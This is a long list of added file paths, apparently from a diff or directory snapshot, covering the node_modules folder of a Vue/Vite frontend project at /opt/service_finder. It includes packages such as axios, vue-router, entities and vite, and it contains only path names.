+/opt/service_finder/frontend/node_modules/proxy-from-env/LICENSE +/opt/service_finder/frontend/node_modules/proxy-from-env/index.js +/opt/service_finder/frontend/node_modules/proxy-from-env/README.md +/opt/service_finder/frontend/node_modules/rfdc +/opt/service_finder/frontend/node_modules/rfdc/index.test-d.ts +/opt/service_finder/frontend/node_modules/rfdc/readme.md +/opt/service_finder/frontend/node_modules/rfdc/index.d.ts +/opt/service_finder/frontend/node_modules/rfdc/test +/opt/service_finder/frontend/node_modules/rfdc/test/index.js +/opt/service_finder/frontend/node_modules/rfdc/package.json +/opt/service_finder/frontend/node_modules/rfdc/.github +/opt/service_finder/frontend/node_modules/rfdc/.github/workflows +/opt/service_finder/frontend/node_modules/rfdc/.github/workflows/ci.yml +/opt/service_finder/frontend/node_modules/rfdc/LICENSE +/opt/service_finder/frontend/node_modules/rfdc/index.js +/opt/service_finder/frontend/node_modules/rfdc/default.js +/opt/service_finder/frontend/node_modules/fdir +/opt/service_finder/frontend/node_modules/fdir/package.json +/opt/service_finder/frontend/node_modules/fdir/dist +/opt/service_finder/frontend/node_modules/fdir/dist/index.cjs +/opt/service_finder/frontend/node_modules/fdir/dist/index.d.mts +/opt/service_finder/frontend/node_modules/fdir/dist/index.d.cts +/opt/service_finder/frontend/node_modules/fdir/dist/index.mjs +/opt/service_finder/frontend/node_modules/fdir/LICENSE +/opt/service_finder/frontend/node_modules/fdir/README.md +/opt/service_finder/frontend/node_modules/ufo +/opt/service_finder/frontend/node_modules/ufo/package.json +/opt/service_finder/frontend/node_modules/ufo/dist +/opt/service_finder/frontend/node_modules/ufo/dist/index.d.ts +/opt/service_finder/frontend/node_modules/ufo/dist/index.cjs +/opt/service_finder/frontend/node_modules/ufo/dist/index.d.mts +/opt/service_finder/frontend/node_modules/ufo/dist/index.d.cts +/opt/service_finder/frontend/node_modules/ufo/dist/index.mjs +/opt/service_finder/frontend/node_modules/ufo/LICENSE +/opt/service_finder/frontend/node_modules/ufo/README.md +/opt/service_finder/frontend/node_modules/entities +/opt/service_finder/frontend/node_modules/entities/src +/opt/service_finder/frontend/node_modules/entities/src/encode.ts +/opt/service_finder/frontend/node_modules/entities/src/internal +/opt/service_finder/frontend/node_modules/entities/src/internal/decode-shared.ts +/opt/service_finder/frontend/node_modules/entities/src/internal/encode-shared.ts +/opt/service_finder/frontend/node_modules/entities/src/internal/bin-trie-flags.ts +/opt/service_finder/frontend/node_modules/entities/src/index.ts +/opt/service_finder/frontend/node_modules/entities/src/escape.ts +/opt/service_finder/frontend/node_modules/entities/src/decode.ts +/opt/service_finder/frontend/node_modules/entities/src/decode-codepoint.ts +/opt/service_finder/frontend/node_modules/entities/src/generated +/opt/service_finder/frontend/node_modules/entities/src/generated/decode-data-html.ts +/opt/service_finder/frontend/node_modules/entities/src/generated/.eslintrc.json +/opt/service_finder/frontend/node_modules/entities/src/generated/decode-data-xml.ts +/opt/service_finder/frontend/node_modules/entities/src/generated/encode-html.ts +/opt/service_finder/frontend/node_modules/entities/readme.md +/opt/service_finder/frontend/node_modules/entities/decode.js +/opt/service_finder/frontend/node_modules/entities/package.json +/opt/service_finder/frontend/node_modules/entities/dist +/opt/service_finder/frontend/node_modules/entities/dist/commonjs +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/decode-codepoint.js.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/internal +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/internal/bin-trie-flags.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/internal/encode-shared.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/internal/encode-shared.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/internal/decode-shared.js +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/internal/decode-shared.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/internal/decode-shared.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/internal/bin-trie-flags.js +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/internal/decode-shared.js.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/internal/encode-shared.js +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/internal/bin-trie-flags.js.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/internal/bin-trie-flags.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/internal/encode-shared.js.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/decode.js.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/decode.js +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/escape.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/index.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/encode.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/package.json +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/escape.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/encode.js.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/escape.js.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/decode.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/decode-codepoint.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/decode-codepoint.js +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/encode.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/index.js +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/decode.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/encode.js +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/decode-codepoint.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/escape.js +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/index.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/index.js.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/generated +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/generated/decode-data-xml.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/generated/decode-data-xml.js +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/generated/encode-html.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/generated/encode-html.js.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/generated/decode-data-xml.js.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/generated/decode-data-html.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/generated/decode-data-html.js.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/generated/encode-html.js +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/generated/decode-data-html.js +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/generated/encode-html.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/generated/decode-data-xml.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/commonjs/generated/decode-data-html.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/esm +/opt/service_finder/frontend/node_modules/entities/dist/esm/decode-codepoint.js.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/internal +/opt/service_finder/frontend/node_modules/entities/dist/esm/internal/bin-trie-flags.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/esm/internal/encode-shared.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/internal/encode-shared.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/esm/internal/decode-shared.js +/opt/service_finder/frontend/node_modules/entities/dist/esm/internal/decode-shared.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/esm/internal/decode-shared.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/internal/bin-trie-flags.js +/opt/service_finder/frontend/node_modules/entities/dist/esm/internal/decode-shared.js.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/internal/encode-shared.js +/opt/service_finder/frontend/node_modules/entities/dist/esm/internal/bin-trie-flags.js.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/internal/bin-trie-flags.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/internal/encode-shared.js.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/decode.js.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/decode.js +/opt/service_finder/frontend/node_modules/entities/dist/esm/escape.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/index.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/esm/encode.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/package.json +/opt/service_finder/frontend/node_modules/entities/dist/esm/escape.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/esm/encode.js.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/escape.js.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/decode.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/esm/decode-codepoint.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/esm/decode-codepoint.js +/opt/service_finder/frontend/node_modules/entities/dist/esm/encode.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/esm/index.js +/opt/service_finder/frontend/node_modules/entities/dist/esm/decode.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/encode.js +/opt/service_finder/frontend/node_modules/entities/dist/esm/decode-codepoint.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/escape.js +/opt/service_finder/frontend/node_modules/entities/dist/esm/index.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/index.js.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/generated +/opt/service_finder/frontend/node_modules/entities/dist/esm/generated/decode-data-xml.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/generated/decode-data-xml.js +/opt/service_finder/frontend/node_modules/entities/dist/esm/generated/encode-html.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/esm/generated/encode-html.js.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/generated/decode-data-xml.js.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/generated/decode-data-html.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/esm/generated/decode-data-html.js.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/generated/encode-html.js +/opt/service_finder/frontend/node_modules/entities/dist/esm/generated/decode-data-html.js +/opt/service_finder/frontend/node_modules/entities/dist/esm/generated/encode-html.d.ts.map +/opt/service_finder/frontend/node_modules/entities/dist/esm/generated/decode-data-xml.d.ts +/opt/service_finder/frontend/node_modules/entities/dist/esm/generated/decode-data-html.d.ts.map +/opt/service_finder/frontend/node_modules/entities/escape.d.ts +/opt/service_finder/frontend/node_modules/entities/decode.d.ts +/opt/service_finder/frontend/node_modules/entities/LICENSE +/opt/service_finder/frontend/node_modules/entities/escape.js +/opt/service_finder/frontend/node_modules/@kurkle +/opt/service_finder/frontend/node_modules/@kurkle/color +/opt/service_finder/frontend/node_modules/@kurkle/color/package.json +/opt/service_finder/frontend/node_modules/@kurkle/color/dist +/opt/service_finder/frontend/node_modules/@kurkle/color/dist/color.esm.js +/opt/service_finder/frontend/node_modules/@kurkle/color/dist/color.d.ts +/opt/service_finder/frontend/node_modules/@kurkle/color/dist/color.cjs +/opt/service_finder/frontend/node_modules/@kurkle/color/dist/color.min.js +/opt/service_finder/frontend/node_modules/@kurkle/color/dist/color.min.js.map +/opt/service_finder/frontend/node_modules/@kurkle/color/LICENSE.md +/opt/service_finder/frontend/node_modules/@kurkle/color/README.md +/opt/service_finder/frontend/node_modules/.package-lock.json +/opt/service_finder/frontend/node_modules/mitt +/opt/service_finder/frontend/node_modules/mitt/index.d.ts +/opt/service_finder/frontend/node_modules/mitt/package.json +/opt/service_finder/frontend/node_modules/mitt/dist +/opt/service_finder/frontend/node_modules/mitt/dist/mitt.js.map +/opt/service_finder/frontend/node_modules/mitt/dist/mitt.js +/opt/service_finder/frontend/node_modules/mitt/dist/mitt.umd.js.map +/opt/service_finder/frontend/node_modules/mitt/dist/mitt.umd.js +/opt/service_finder/frontend/node_modules/mitt/dist/mitt.mjs +/opt/service_finder/frontend/node_modules/mitt/dist/mitt.mjs.map +/opt/service_finder/frontend/node_modules/mitt/LICENSE +/opt/service_finder/frontend/node_modules/mitt/README.md +/opt/service_finder/frontend/node_modules/vue-router +/opt/service_finder/frontend/node_modules/vue-router/vue-router-auto-routes.d.mts +/opt/service_finder/frontend/node_modules/vue-router/vue-router-auto.d.ts +/opt/service_finder/frontend/node_modules/vue-router/vue-router-auto-resolver.d.mts +/opt/service_finder/frontend/node_modules/vue-router/package.json +/opt/service_finder/frontend/node_modules/vue-router/dist +/opt/service_finder/frontend/node_modules/vue-router/dist/vue-router.global.prod.js +/opt/service_finder/frontend/node_modules/vue-router/dist/options-DnbrHliP.d.cts +/opt/service_finder/frontend/node_modules/vue-router/dist/options-BHlG2BUV.d.mts +/opt/service_finder/frontend/node_modules/vue-router/dist/vue-router.prod.cjs +/opt/service_finder/frontend/node_modules/vue-router/dist/vue-router.esm-bundler.js +/opt/service_finder/frontend/node_modules/vue-router/dist/navigation-guard-fRmgNnli.mjs +/opt/service_finder/frontend/node_modules/vue-router/dist/volar +/opt/service_finder/frontend/node_modules/vue-router/dist/volar/sfc-typed-router.d.cts +/opt/service_finder/frontend/node_modules/vue-router/dist/volar/sfc-route-blocks.cjs +/opt/service_finder/frontend/node_modules/vue-router/dist/volar/sfc-route-blocks.d.cts +/opt/service_finder/frontend/node_modules/vue-router/dist/volar/sfc-typed-router.cjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin-BpN0479a.cjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/vite.d.cts +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/esbuild.d.mts +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/vite.d.mts +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/vite.mjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/rollup.mjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/rollup.d.mts +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/types.cjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/types.mjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/webpack.d.cts +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/rollup.d.cts +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/index.cjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/rolldown.mjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/options.d.cts +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/rolldown.d.mts +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/options.cjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/types.d.cts +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/esbuild.mjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/vite.cjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/rolldown.d.cts +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/esbuild.cjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/webpack.cjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/esbuild.d.cts +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/options.d.mts +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/types.d.mts +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/webpack.d.mts +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/rollup.cjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/webpack.mjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/options.mjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/rolldown.cjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/index.d.mts +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/index.d.cts +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin/index.mjs +/opt/service_finder/frontend/node_modules/vue-router/dist/index-5v_ymVK9.d.mts +/opt/service_finder/frontend/node_modules/vue-router/dist/vue-router.d.mts +/opt/service_finder/frontend/node_modules/vue-router/dist/experimental +/opt/service_finder/frontend/node_modules/vue-router/dist/experimental/pinia-colada.d.mts +/opt/service_finder/frontend/node_modules/vue-router/dist/experimental/pinia-colada.mjs +/opt/service_finder/frontend/node_modules/vue-router/dist/experimental/index.d.mts +/opt/service_finder/frontend/node_modules/vue-router/dist/experimental/index.mjs +/opt/service_finder/frontend/node_modules/vue-router/dist/unplugin-CAVpGgFU.mjs +/opt/service_finder/frontend/node_modules/vue-router/dist/index-D_cHAFdr.d.mts +/opt/service_finder/frontend/node_modules/vue-router/dist/useApi-DQ_OuAZT.mjs +/opt/service_finder/frontend/node_modules/vue-router/dist/options-DCEQBG2O.cjs +/opt/service_finder/frontend/node_modules/vue-router/dist/vue-router.mjs +/opt/service_finder/frontend/node_modules/vue-router/dist/vue-router.global.js +/opt/service_finder/frontend/node_modules/vue-router/dist/vue-router.esm-browser.prod.js +/opt/service_finder/frontend/node_modules/vue-router/dist/vue-router.cjs +/opt/service_finder/frontend/node_modules/vue-router/dist/devtools-BT_a1Bh8.mjs +/opt/service_finder/frontend/node_modules/vue-router/dist/vue-router.esm-browser.js +/opt/service_finder/frontend/node_modules/vue-router/dist/options-DHij9uO1.mjs +/opt/service_finder/frontend/node_modules/vue-router/LICENSE +/opt/service_finder/frontend/node_modules/vue-router/vetur +/opt/service_finder/frontend/node_modules/vue-router/vetur/tags.json +/opt/service_finder/frontend/node_modules/vue-router/vetur/attributes.json +/opt/service_finder/frontend/node_modules/vue-router/index.js +/opt/service_finder/frontend/node_modules/vue-router/node_modules +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-kit +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-kit/global.d.ts +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-kit/types.d.ts +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-kit/package.json +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-kit/dist +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-kit/dist/index.d.ts +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-kit/dist/index.cjs +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-kit/dist/index.js +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-kit/dist/index.d.cts +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-kit/LICENSE +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-kit/README.md +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-shared +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-shared/package.json +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-shared/dist +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-shared/dist/index.d.ts +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-shared/dist/index.cjs +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-shared/dist/index.js +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-shared/dist/index.d.cts +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-shared/LICENSE +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-shared/README.md +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-api +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-api/package.json +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-api/dist +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-api/dist/index.d.ts +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-api/dist/index.cjs +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-api/dist/index.js +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-api/dist/chunk.js +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-api/dist/index.d.cts +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-api/LICENSE +/opt/service_finder/frontend/node_modules/vue-router/node_modules/@vue/devtools-api/README.md +/opt/service_finder/frontend/node_modules/vue-router/node_modules/perfect-debounce +/opt/service_finder/frontend/node_modules/vue-router/node_modules/perfect-debounce/package.json +/opt/service_finder/frontend/node_modules/vue-router/node_modules/perfect-debounce/dist +/opt/service_finder/frontend/node_modules/vue-router/node_modules/perfect-debounce/dist/index.d.mts +/opt/service_finder/frontend/node_modules/vue-router/node_modules/perfect-debounce/dist/index.mjs +/opt/service_finder/frontend/node_modules/vue-router/node_modules/perfect-debounce/LICENSE +/opt/service_finder/frontend/node_modules/vue-router/node_modules/perfect-debounce/README.md +/opt/service_finder/frontend/node_modules/vue-router/README.md +/opt/service_finder/frontend/node_modules/vue-router/route.schema.json +/opt/service_finder/frontend/node_modules/vue-router/vue-router.node.mjs +/opt/service_finder/frontend/node_modules/axios +/opt/service_finder/frontend/node_modules/axios/index.d.ts +/opt/service_finder/frontend/node_modules/axios/lib +/opt/service_finder/frontend/node_modules/axios/lib/core +/opt/service_finder/frontend/node_modules/axios/lib/core/settle.js +/opt/service_finder/frontend/node_modules/axios/lib/core/Axios.js +/opt/service_finder/frontend/node_modules/axios/lib/core/AxiosError.js +/opt/service_finder/frontend/node_modules/axios/lib/core/dispatchRequest.js +/opt/service_finder/frontend/node_modules/axios/lib/core/buildFullPath.js +/opt/service_finder/frontend/node_modules/axios/lib/core/InterceptorManager.js +/opt/service_finder/frontend/node_modules/axios/lib/core/AxiosHeaders.js +/opt/service_finder/frontend/node_modules/axios/lib/core/mergeConfig.js +/opt/service_finder/frontend/node_modules/axios/lib/core/transformData.js +/opt/service_finder/frontend/node_modules/axios/lib/core/README.md +/opt/service_finder/frontend/node_modules/axios/lib/adapters +/opt/service_finder/frontend/node_modules/axios/lib/adapters/fetch.js +/opt/service_finder/frontend/node_modules/axios/lib/adapters/adapters.js +/opt/service_finder/frontend/node_modules/axios/lib/adapters/http.js +/opt/service_finder/frontend/node_modules/axios/lib/adapters/README.md +/opt/service_finder/frontend/node_modules/axios/lib/adapters/xhr.js +/opt/service_finder/frontend/node_modules/axios/lib/platform +/opt/service_finder/frontend/node_modules/axios/lib/platform/node +/opt/service_finder/frontend/node_modules/axios/lib/platform/node/classes +/opt/service_finder/frontend/node_modules/axios/lib/platform/node/classes/FormData.js +/opt/service_finder/frontend/node_modules/axios/lib/platform/node/classes/URLSearchParams.js +/opt/service_finder/frontend/node_modules/axios/lib/platform/node/index.js +/opt/service_finder/frontend/node_modules/axios/lib/platform/common +/opt/service_finder/frontend/node_modules/axios/lib/platform/common/utils.js +/opt/service_finder/frontend/node_modules/axios/lib/platform/index.js +/opt/service_finder/frontend/node_modules/axios/lib/platform/browser +/opt/service_finder/frontend/node_modules/axios/lib/platform/browser/classes +/opt/service_finder/frontend/node_modules/axios/lib/platform/browser/classes/Blob.js +/opt/service_finder/frontend/node_modules/axios/lib/platform/browser/classes/FormData.js +/opt/service_finder/frontend/node_modules/axios/lib/platform/browser/classes/URLSearchParams.js +/opt/service_finder/frontend/node_modules/axios/lib/platform/browser/index.js +/opt/service_finder/frontend/node_modules/axios/lib/axios.js +/opt/service_finder/frontend/node_modules/axios/lib/utils.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers +/opt/service_finder/frontend/node_modules/axios/lib/helpers/resolveConfig.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/speedometer.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/throttle.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/buildURL.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/null.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/isURLSameOrigin.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/toURLEncodedForm.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/progressEventReducer.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/composeSignals.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/HttpStatusCode.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/combineURLs.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/parseProtocol.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/isAbsoluteURL.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/bind.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/spread.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/toFormData.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/ZlibHeaderTransformStream.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/formDataToStream.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/fromDataURI.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/cookies.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/isAxiosError.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/formDataToJSON.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/AxiosTransformStream.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/deprecatedMethod.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/README.md +/opt/service_finder/frontend/node_modules/axios/lib/helpers/parseHeaders.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/readBlob.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/validator.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/estimateDataURLDecodedBytes.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/trackStream.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/callbackify.js +/opt/service_finder/frontend/node_modules/axios/lib/helpers/AxiosURLSearchParams.js +/opt/service_finder/frontend/node_modules/axios/lib/env +/opt/service_finder/frontend/node_modules/axios/lib/env/data.js +/opt/service_finder/frontend/node_modules/axios/lib/env/classes +/opt/service_finder/frontend/node_modules/axios/lib/env/classes/FormData.js +/opt/service_finder/frontend/node_modules/axios/lib/env/README.md +/opt/service_finder/frontend/node_modules/axios/lib/defaults +/opt/service_finder/frontend/node_modules/axios/lib/defaults/transitional.js +/opt/service_finder/frontend/node_modules/axios/lib/defaults/index.js +/opt/service_finder/frontend/node_modules/axios/lib/cancel +/opt/service_finder/frontend/node_modules/axios/lib/cancel/isCancel.js +/opt/service_finder/frontend/node_modules/axios/lib/cancel/CancelToken.js +/opt/service_finder/frontend/node_modules/axios/lib/cancel/CanceledError.js +/opt/service_finder/frontend/node_modules/axios/package.json +/opt/service_finder/frontend/node_modules/axios/dist +/opt/service_finder/frontend/node_modules/axios/dist/node +/opt/service_finder/frontend/node_modules/axios/dist/node/axios.cjs.map +/opt/service_finder/frontend/node_modules/axios/dist/node/axios.cjs +/opt/service_finder/frontend/node_modules/axios/dist/axios.min.js +/opt/service_finder/frontend/node_modules/axios/dist/axios.js +/opt/service_finder/frontend/node_modules/axios/dist/axios.min.js.map +/opt/service_finder/frontend/node_modules/axios/dist/browser +/opt/service_finder/frontend/node_modules/axios/dist/browser/axios.cjs.map +/opt/service_finder/frontend/node_modules/axios/dist/browser/axios.cjs +/opt/service_finder/frontend/node_modules/axios/dist/axios.js.map +/opt/service_finder/frontend/node_modules/axios/dist/esm +/opt/service_finder/frontend/node_modules/axios/dist/esm/axios.min.js +/opt/service_finder/frontend/node_modules/axios/dist/esm/axios.js +/opt/service_finder/frontend/node_modules/axios/dist/esm/axios.min.js.map +/opt/service_finder/frontend/node_modules/axios/dist/esm/axios.js.map +/opt/service_finder/frontend/node_modules/axios/LICENSE +/opt/service_finder/frontend/node_modules/axios/index.js +/opt/service_finder/frontend/node_modules/axios/MIGRATION_GUIDE.md +/opt/service_finder/frontend/node_modules/axios/README.md +/opt/service_finder/frontend/node_modules/axios/index.d.cts +/opt/service_finder/frontend/node_modules/axios/CHANGELOG.md +/opt/service_finder/frontend/node_modules/vite +/opt/service_finder/frontend/node_modules/vite/client.d.ts +/opt/service_finder/frontend/node_modules/vite/types +/opt/service_finder/frontend/node_modules/vite/types/internal +/opt/service_finder/frontend/node_modules/vite/types/internal/terserOptions.d.ts +/opt/service_finder/frontend/node_modules/vite/types/internal/lightningcssOptions.d.ts +/opt/service_finder/frontend/node_modules/vite/types/internal/cssPreprocessorOptions.d.ts +/opt/service_finder/frontend/node_modules/vite/types/metadata.d.ts +/opt/service_finder/frontend/node_modules/vite/types/customEvent.d.ts +/opt/service_finder/frontend/node_modules/vite/types/hot.d.ts +/opt/service_finder/frontend/node_modules/vite/types/package.json +/opt/service_finder/frontend/node_modules/vite/types/import-meta.d.ts +/opt/service_finder/frontend/node_modules/vite/types/importMeta.d.ts +/opt/service_finder/frontend/node_modules/vite/types/importGlob.d.ts +/opt/service_finder/frontend/node_modules/vite/types/hmrPayload.d.ts +/opt/service_finder/frontend/node_modules/vite/package.json +/opt/service_finder/frontend/node_modules/vite/dist +/opt/service_finder/frontend/node_modules/vite/dist/node +/opt/service_finder/frontend/node_modules/vite/dist/node/index.d.ts +/opt/service_finder/frontend/node_modules/vite/dist/node/module-runner.d.ts +/opt/service_finder/frontend/node_modules/vite/dist/node/index.js +/opt/service_finder/frontend/node_modules/vite/dist/node/chunks +/opt/service_finder/frontend/node_modules/vite/dist/node/chunks/config2.js +/opt/service_finder/frontend/node_modules/vite/dist/node/chunks/postcss-import.js 